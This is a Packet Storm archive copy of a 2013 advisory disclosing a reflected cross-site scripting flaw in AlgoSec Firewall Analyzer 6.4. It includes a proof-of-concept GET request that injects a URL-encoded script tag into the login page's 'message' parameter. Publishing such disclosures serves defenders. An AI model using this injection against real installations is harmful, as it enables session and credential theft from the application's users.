what you don't know can hurt you

AlgoSec Firewall Analyzer 6.4 Cross Site Scripting

AlgoSec Firewall Analyzer 6.4 Cross Site Scripting
Posted Aug 21, 2013
Authored by asheesh anaconda, Asheesh Kumar Mani Tripathi

AlgoSec Firewall Analyzer version 6.4 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 5043291b531114b392f9907725929971

AlgoSec Firewall Analyzer 6.4 Cross Site Scripting

Change Mirror Download
================================================================================================================================================================

AlgoSec Firewall Analyzer Version v6.4 cross-site scripting (XSS) Vulnerability
================================================================================================================================================================


#Date- 21/8/2013

# code by Asheesh kumar Mani Tripathi



# Credit by Asheesh Anaconda



#Vulnerbility
AlgoSec Firewall Analyzer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities


========================================================================================================================

Request
========================================================================================================================

GET /BusinessFlow/login?message=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%2811111%29%3C%2fScRiPt%3E HTTP/1.1
Host: 172.28.154.163
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1


========================================================================================================================

Response
========================================================================================================================

HTTP/1.0 200 OK
Date: Wed, 21 Aug 2013 13:57:31 GMT
Server: Apache-Coyote/1.1
X-Frame-Options: SAMEORIGIN

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close